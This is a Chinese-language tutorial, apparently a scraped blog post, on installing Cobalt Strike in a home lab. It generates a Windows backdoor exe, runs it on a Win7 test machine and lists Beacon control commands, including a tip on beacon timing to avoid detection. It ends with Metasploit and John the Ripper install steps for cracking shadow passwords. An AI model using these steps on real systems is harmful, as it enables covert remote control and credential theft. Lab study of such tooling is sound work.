安全工具|ubuntu安装CobaltStrike，MSF，john linux|ubuntu

ubuntu安装CobaltStrike
ubuntu做服务端，windows10本机做客户端，win7做运行木\haha马的机子

文章图片

sudo ./teamserver ubuntuIP 自定义连接密码

文章图片

win10，点击cs.bat

文章图片

弹出cmd对话框

文章图片

静待会出现cs的连接框
host：ubuntuIP
port：默认
user：名字随便起
password：刚自定义的连接密码

文章图片

连接成功

文章图片
注意：
3. 50050端口
4. ubuntu和win10要ping通（nat模式）
使用

设置监听
名字：生成后门时候可作为区别标志
host：ubuntIP
port：随便找个不常用的

文章图片
攻击—生成后门—windows exe
选择刚才设置的监听
因为我要把这个exe放在win7上执行，win7是64位的

文章图片

win7运行刚生成的exe

文章图片

win10这里提示上线

文章图片

参考博文

常用基础命令

help →查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样help upload
note →给当前目录机器起个名字, note beacon-shell
cd →在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用’/’ cd c:
mkdir →新建目录, mkdir d:beacon
rm →删除文件或目录, rm d:beacon
upload →上传文件到目标系统中
【安全工具|ubuntu安装CobaltStrike，MSF，john】download →从目标系统下载指定文件, download C:Userswin7cnDesktopputty.exe
cancel →取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下
shell →在目标系统中执行指定的cmd命令, shell whoami
getuid → 查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权
pwd →查看当前在目录系统中的路径
ls →列出当前目录下的所有文件和目录
drives →列表出目标系统的所有分区[win中叫盘符]
ps →查看目标系统当前的所有的进程列表
kill →杀掉指定进程, kill 4653
sleep 10 →指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可
jobs →列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除
jobkill →如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, jobkill 1345
clear →清除beacon内部的任务队列
checkin →强制让被控端回连一次
exit →终止当前beacon 会话
ctrl + k →清屏
在控制台所有操作指令都会被记录保留在Cobalt Strike目录logs下

ubuntu安装msf 参考博文
博文

文章图片
下载

文章图片

放到/opt下

文章图片

sudo dpkg -i metasploit-framework_6.1.2+20210824102555~1rapid7-1_amd64.deb sudo apt install postgresql sudo service postgresql status

文章图片

输入msfconsole，进行配置
john破解linux的shadow密码使用参考
2
shadow内容详解
安装John the Ripper
下载：wget http://www.openwall.com/john/j/john-1.8.0.tar.gz
解压：tar -xvf john-1.8.0.tar.gz
进入john-1.8.0/src目录：cd john-1.8.0/src